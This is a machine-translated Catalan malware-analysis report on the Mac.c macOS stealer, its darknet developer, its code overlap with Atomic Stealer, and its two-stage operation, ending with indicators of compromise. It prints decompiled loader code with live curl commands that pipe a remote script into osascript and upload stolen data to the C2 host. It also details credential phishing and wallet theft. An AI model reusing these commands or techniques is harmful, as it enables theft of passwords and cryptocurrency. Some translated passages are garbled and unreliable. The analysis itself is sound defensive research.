La història del lladre de Mac.c no comença amb una campanya important o una infracció, sinó que comença en els racons buits dels fòrums de darknet, on va aparèixer per primera vegada un actor d'amenaça anomenat "mentalpositiu", que va cridar l'atenció amb un conjunt de trets inusuals que el van distingir d'altres desenvolupadors de lladres. Ja podem veure que és un nou actor aprofitant un mercat de malware de macOS que segueix sent molt menys saturat que el seu homòleg de Windows, marcant l'augment de la nova onada d'actors de amenaces que són tant tècnicament hàbils com comercialment ambiciosos. Lluna Encara que només recentment actiu, Mac.c ja està competint amb les operacions de lladre més grans i més establertes com Mentre que es presta molt de l'AMOS i A mesura que s'afegeixen més URL a la seva infraestructura de comandament i control, Mac.c sembla formar part d'un ecosistema subterrani més gran dirigit als usuaris de macOS. MacOS Stealer atòmic Rodalies4 El que també destaca és un enfocament metòdic i inusualment transparent per a la construcció en públic. actualitzacions de progrés compartits "mentalpositius" i fins i tot el feedback recopilat sobre les construccions de Mac.c - un nivell sorprenent d'obertura en el món típicament secret del desenvolupament de malware de macOS. En aquest article, rastrejarem l’evolució de Mac.c, desempacar les tàctiques de mentalpositive, i examinar com aquest lladre s’adapta al paisatge més ampli de les amenaces dirigides a les plataformes d’Apple. Un nou jugador al mercat Fa uns quatre mesos, Moonlock Lab va notar per primera vegada l'aparició del lladre de Mac.c i el va atribuir a un desenvolupador sota l'àlies "mentalpositiu". Igual que altres agents de amenaces, "mentalpositive" adopta tendències recents en el desenvolupament de malware: arquitectura modular per a l'ús a través de diferents campanyes, tècniques avançades d'ocupació i infraestructures de comandament i control (C2) cada vegada més complexes. No obstant això, l'abast de perfils d'objectiu i d'exfiltració de dades del Mac.c de mentalpositive destaca. recull les credencials de la clau de iCloud, les contrasenyes emmagatzemades en el navegador, les carteres de criptografia, les metadades del sistema i fins i tot els arxius de llocs específics en macOS, tot utilitzant credencials obtinguts mitjançant el phishing. Edificis en públic Més enllà del disseny tècnic, "mentalpositive" va mostrar un comportament inusual a través de fòrums de darknet. Durant diversos mesos, aquest actor de amenaces va utilitzar un fòrum subterrani per mostrar actualitzacions incrementals a Mac.c, interactuar amb usuaris potencials i sol·licitar activament el feedback. Aquesta publicitat pot senyalitzar una intenció d'augmentar la visibilitat i esculpir una presència distinta al mercat. També sembla posar les bases per a un model de negoci personalitzat de lladre com a servei dirigit exclusivament al nínxol d'amenaça de macOS. Les captures de pantalla a continuació mostren com els missatges del fòrum van evolucionar amb el temps a mesura que es van anunciar noves característiques. Des que els missatges originals van ser escrits en rus, hem inclòs una breu explicació per a cadascun. Segons ells, algunes de les actualitzacions més notables van incloure: la substitució de l'aplicació original Ledger Live, la reducció de la mida binària del fitxer (per a una descàrrega més ràpida i potencialment menys detectables artefactes a través de l'anàlisi estàtica), i l'optimització del panell administratiu. En aquest context, un panell es refereix a una interfície basada en la web per als clients "mentalpositius", els compradors del lladre de Mac.c. Això els permet generar edicions de programari maliciós, rastrejar infeccions (incloent intents reeixits i fallits), i gestionar altres detalls de la campanya. Com es va esmentar anteriorment, 'mentalpositive' va actualitzar amb freqüència el seu fil del fòrum per mantenir els clients potencials involucrats mostrant que el desenvolupament està en curs. A continuació es mostra un exemple d'aquesta actualització, on l'actor de la amenaça afirma haver provat l'última versió del lladre contra les versions de macOS anteriors a 10.12.6. Tox i Jabber. Telegrama I finalment, el post més recent en el moment d'escriure descriu actualitzacions addicionals. Aquestes inclouen el pas de XProtect generant edicions úniques des de zero, una llista ampliada de navegadors compatibles, l'activació del captador de fitxers a través del panell de control i, sobretot, un mòdul separat per a les frases de llavor de Trezor de phishing. Semblances amb els amants Curiosament, alguns desenvolupadors darrere dels lladres competidors han qüestionat l'originalitat del codi Mac.c, suggerint que podria ser una versió modificada de la coneguda Atomic macOS Stealer. Moonlock Lab va analitzar i va comparar les últimes càrregues de beneficis de tots dos lladres, i AMOS es cobreix en detall en Mentre que els dos comparteixen parts del codi idèntic, la funcionalitat implementada per "mentalpositive" és significativament més limitada. Un dels nostres últims articles (S'ha destacat en color vermell) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff Primer vist a la selva: 2025-06-19 20:18:55 ' (S'ha destacat en color verd) mentalpositive SHA256: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 Primer vist a la selva: 2025-07-01 15:41:49 Una inspecció detallada revela una reutilització substancial del codi a nivell de funció entre Mac.c i Atomic macOS Stealer. En diversos casos, les funcions semblen haver estat copiades verbalment o amb modificacions mínimes, suggerint un origen compartit del desenvolupament o un préstec directe del codi. Funcionalment, ambdós lladres comparteixen un conjunt de característiques gairebé idèntics dissenyats per al robatori complet de dades en sistemes macOS. En tots dos casos, aquestes capacitats s'executen utilitzant eines i scripts natius de macOS, minimitzant les dependències externes i millorant l'evasió. Malgrat els seus interns compartits, AMOS introdueix avenços significatius en persistència, modularitat i targeting. Mentre que Mac.c funciona com un lladre compacte i no persistent basat en AppleScript, Atomic macOS Stealer representa una amenaça més avançada, persistent i modular de la mateixa filosofia de disseny. L'alt grau de reutilització del codi planteja qüestions importants sobre l'atribució, la disponibilitat del constructor i la potencial col·laboració dins dels cercles de desenvolupament de malware de macOS. Mentre que l'eina "mentalpositiva" pot ser més nova, no és completament original - i AMOS segueix sent la variant més capaç i perillosa del lladre observada avui en dia. Com funciona el Mac.c Stealer Ja s’ha esmentat en Des de llavors, el seu domini operatiu no ha canviat: https://lagkill[.]cc. Allotja arxius PHP utilitzats per rastrejar víctimes i alguns procediments d'exfiltració. 'mentalpositive' Un informe de Moonlock Lab Aquest domini té relacions amb diversos arxius Mach-O, però en general el flux de treball es pot resumir en 2 etapes: Mach-O inicialment executable i AppleScript càrrega útil. Fase 1: Mach-O inicialment executable El lladre Mac.c utilitza una estratègia d'execució en múltiples etapes, amb la seva primera etapa actuant com un carregador lleuger responsable del desplegament ocult, la sanejament ambiental i el lliurament controlat de la següent càrrega útil. A continuació es mostra una descomposició detallada d'aquesta etapa, basada en l'enginyeria inversa de la mostra 90309fc3b90df1d7b6d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } El punt d'entrada de Mac.c (entry()) comença per forxar el procés actual i crear una nova sessió a través de setsid(), efectivament desmonitzant-se. A més, vam observar una funcionalitat bàsica que redirigeix tots els fluxos d'entrada, sortida i error estàndard a /dev/null utilitzant freopen(). El programari maliciós codifica el domini de comandament i control (C2) com: lagkill[.]cc. També genera un identificador de víctima únic concatenant múltiples cadenes estàtiques hexadecimals. Això resulta en un token txd pseudo-únic, utilitzat per donar empremta del host infectat o per rastrejar batxes d'infeccions durant la comunicació C2. L'acció clau en aquesta etapa és recuperar i executar un AppleScript remot. Això s'aconsegueix mitjançant la cadena curl i osascript per descarregar i executar immediatament la càrrega útil: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Aquest mètode permet a l'atacant actualitzar la càrrega útil dinàmicament sense modificar el carregador, fent que l'atribució sigui més difícil a causa del camí d'execució indirecte. Després de l'execució d'AppleScript (que probablement realitza el robatori de dades local), el carregador comprova l'èxit i procedeix a exfiltrar un arxiu ZIP de nou al mateix servidor C2: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Aquesta càrrega s'envia utilitzant encapçalaments personalitzats (cl: 0) i un temps generós per acomodar sistemes més lents, suggerint una atenció acurada a l'estabilitat operativa. Etapa 2: AppleScript càrrega de pagament La segona etapa del robatori de Mac.c és on comença el dany real. Una càrrega útil d'AppleScript armatitza les capacitats de scripting natius de macOS per extreure una àmplia gamma de dades sensibles. A continuació, dividim les tàctiques de la càrrega útil de la segona etapa per categoria. Credential theft & CLI abuse El guió llança una falsa sol·licitud de sistema demanant la contrasenya de l'usuari. Això s'emmagatzema en plaintext i es reutilitza més tard. Més tard, invoca silenciosament la utilitat CLI de seguretat per extreure credencials guardats de la Keychain, específicament dirigides a Google Chrome i aplicacions basades en Chromium. Les dades recuperades s'escriuen a /tmp/<random>/Password. Aquesta tàctica de phishing aprofita la confiança nativa i les interfícies macOS conegudes per evitar l'escepticisme de l'usuari. Browser and extensions data theft Els navegadors objectius inclouen Chrome, Edge, Brave i Yandex. Els arxius extrets inclouen: dades de login, cookies, dades web, emmagatzematge IndexedDB. Finalment, el guió itera a través de centenars de conegudes extensions de cartera de criptografia, com MetaMask, Phantom i Binance Wallet, i treu arxius d'emmagatzematge local o artefactes de sessió. Totes les partides relacionades amb el navegador estan organitzades en /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting La càrrega de pagament escaneja per a la presència de carteres de cripto populars, incloent: Elèctric Exposició Coinòmiques Atòmica Moneda Wasabi El Ledger viu Les dades rellevants, com ara arxius de cartera i bases de dades de configuració (per exemple, directori LevelDB) es copien a /tmp/<random>/Cryptowallets/. Això indica una clara motivació financera, amb l'objectiu adaptat a la base d'usuaris entusiastes de cripto de macOS. File-grabber and its logic Per maximitzar el valor d'intel·ligència tot minimitzant l'empremta, el guió fa el següent: Busca recurrentment les carpetes Desktop, Documents i Descàrregues de l'usuari. Filtres per a tipus de fitxers d'alt valor: .wallet, .seed, .txt, .keys, .pdf, .docx. Imposa un límit de mida de fitxer ~10MB. Aquest enfocament prioritza els arxius de baix soroll, d'alt senyal que inclouen frases de llavor potencial, claus de recuperació i PDFs sensibles. Collection of messaging and app artifacts Mac.c copia la carpeta tdata, que pot incloure tokens de sessió actius o missatges en memòria cau (aquells que estan connectats a Telegram). Els arxius de configuració de les aplicacions Binance i Ton Keeper també es copien, oferint informació sobre l'ús de la cartera, els patrons d'inici de sessió o les claus emmagatzemades. L'ús típic de system_profiler per recollir dades de maquinari, macOS i de visualització. Aquesta ampliació suggereix una intenció de reconstruir el context de l'usuari, no només d'exfiltrar actius. Archiving and exfiltration Totes les dades recollides s'organitzen en un directori temporal estructurat /tmp/<random>/. Utilitzant ditto -c -k, l'eina d'arxiu nativa de macOS, tot el directori es zippa a /tmp/osalogging.zip. Després de l'arxiu, la càrrega útil surt. No hi ha seguiment de fons o execució repetida. Aquest disseny efímer, centrat en el secret, apunta a una operació ràpida de trencament i captura, probablement destinada a l'accés d'un sol ús o com a part d'una cadena d'infeccions més gran. Estratègia de phishing Una tècnica particularment enganyosa utilitzada en la càrrega de rendiment de la segona etapa de 'mentalpositive' implica un fals missatge de sistema disfrazat com una sol·licitud d'autorització de joc. per salvar els seus arxius”. Bruixes innocents A més, aquestes càrregues de pagament vénen amb una etiqueta de construcció ‘innocent’ (o, en alguns casos, ‘innocent’), probablement utilitzat per identificar les infeccions vinculades a aquesta campanya específica. Finalment, el domini probablement llogat específicament per a aquesta campanya és innocentwitches[.]top.Mentre que l'URL arrel redirigeix a Google, també inclou una ruta /upload.php, permetent a l'actor de la amenaça rebre dades robades. Conclusions A mesura que els ordinadors Mac continuen augmentant en popularitat entre els usuaris mitjans i els titulars de criptografia en particular, esperem que els lladres augmentin no només en la seva capacitat, sinó en la seva quota de mercat i impacte. Mac.c no és un cas aïllat, sinó que forma part d'una tendència creixent cap al desenvolupament de malware macOS professionalitzat. Tot i que reutilitza les funcions clau i els elements arquitectònics del popular Atomic Stealer, també aporta novetats als lladres de macOS i els posa en una trajectòria distinta. El que podem estar veient és l'aparició d'un nou model de negoci: el lladre com a servei, dirigit específicament als usuaris de macOS i que s'estén de la indústria més àmplia de malware com a servei. Tot i que Atomic Stealer segueix sent una variant més perillosa, podria ser només una qüestió de temps quan nous jugadors ambiciosos utilitzin el seu llegat per construir un producte de malware més robatori i més accessible. IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7dfd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7 57b86903c46cf45c968aa9618c0a45eb135e05b24c13c0d27442d4387de37319 61f6b48e8433f6bf212c06157bead662f1833b72671b8f832ff3af032fdc4582
